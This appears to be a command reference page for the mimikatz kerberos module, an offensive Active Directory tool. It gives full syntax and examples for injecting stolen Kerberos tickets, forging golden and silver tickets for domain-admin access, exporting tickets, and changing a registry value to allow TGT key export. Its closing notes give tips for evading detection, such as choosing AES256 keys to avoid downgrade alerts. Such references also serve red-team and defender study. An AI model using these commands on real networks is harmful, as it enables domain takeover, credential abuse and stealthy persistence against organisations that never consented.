kerberos
Interact with Kerberos tickets using the official Microsoft Kerberos API. No elevated privileges required for most commands. Used for Pass-the-Ticket and forging golden/silver tickets.
ptt β Pass-the-Ticket
Inject one or more Kerberos tickets into the current session.
mimikatz # kerberos::ptt <ticket.kirbi>
mimikatz # kerberos::ptt <directory\>
Options
<ticket.kirbi>β single ticket file path (or multiple space-separated)<directory>β directory containing.kirbifiles for batch injection
Examples
mimikatz # kerberos::ptt Administrator@krbtgt-<domain>.kirbi
Ticket 'Administrator@krbtgt-<domain>.kirbi' successfully submitted for current session
# Inject all tickets from a directory
mimikatz # kerberos::ptt C:\temp\tickets\
golden / silver β Forge Tickets
Create arbitrary Kerberos TGT (golden) or service ticket (silver) with custom user/group membership.
mimikatz # kerberos::golden /user:<username> /domain:<domain> /sid:<sid> /krbtgt:<nt-hash> [/id:<user-id>] [/groups:<group-ids>] [/ticket:<output>.kirbi] [/ptt] [/startoffset:<min>] [/endin:<min>] [/renewmax:<min>] [/aes128:<aes128-key>] [/aes256:<aes256-key>]
Options β All (golden and silver)
/user:<username>β username to embed in ticket/domain:<domain>β fully qualified domain name (e.g.corp.local)/sid:<sid>β domain SID (e.g.S-1-5-21-...)/krbtgt:<nt-hash>β krbtgt NTLM hash (alias:/rc4)/rc4:<rc4>β RC4/NTLM hash/aes128:<aes128-key>β AES128 encryption key/aes256:<aes256-key>β AES256 encryption key (preferred)/id:<user-id>β user RID (default: 500 / Administrator)/groups:<group-ids>β comma-separated group RIDs (default:513,512,520,518,519)/ticket:<output>.kirbiβ output file (default:ticket.kirbi)/pttβ inject directly into current session/startoffset:<min>β ticket start offset in minutes (negative = past)/endin:<min>β ticket duration in minutes/renewmax:<min>β max renewal duration in minutes
Options β Silver Ticket Only
/target:<hostname>β target server hostname/service:<svc>β service name:cifs,http,mssql,rpcss,host,ldap, etc.
Examples
# Golden ticket (RC4)
mimikatz # kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /krbtgt:<nt-hash> /ptt
# Golden ticket (AES256, stealthier)
mimikatz # kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /aes256:<aes256-key> /ptt
# Golden ticket with custom group membership + extra SID (cross-domain)
mimikatz # kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /krbtgt:<nt-hash> /groups:512,513,519 /sids:<parent-domain-sid>-519 /ptt
# Silver ticket (cifs)
mimikatz # kerberos::golden /user:<username> /domain:<domain> /sid:<sid> /target:<computer>.<domain> /service:cifs /rc4:<rc4> /ptt
# Silver ticket (ldap β for DCSync)
mimikatz # kerberos::golden /user:<username> /domain:<domain> /sid:<sid> /target:<dc>.<domain> /service:ldap /rc4:<rc4> /ptt
# Save to file
mimikatz # kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /krbtgt:<nt-hash> /ticket:<output>.kirbi
tgt β Display Current TGT
Show TGT information for the current session.
mimikatz # kerberos::tgt
Note: Null session keys indicate allowtgtsessionkey registry value is 0. Set it to 1 to enable TGT export:
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters /v AllowTGTSessionKey /t REG_DWORD /d 1
list β List Tickets
Enumerate and optionally export current session's Kerberos tickets.
mimikatz # kerberos::list [/export]
/exportβ save all tickets as.kirbifiles in current directory
purge β Remove All Tickets
Remove all Kerberos tickets from the current session.
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
Notes
- Golden tickets bypass password changes β krbtgt hash must be rotated twice to invalidate
- Golden tickets are not issued by the real KDC β no authentication event is logged at ticket creation
- Use AES256 keys over RC4 to avoid encryption downgrade detection events
- Silver tickets only require the service account's hash (not krbtgt) β more targeted, lower noise
- After injection with
/pttorkerberos::ptt, useklist(built-in) to verify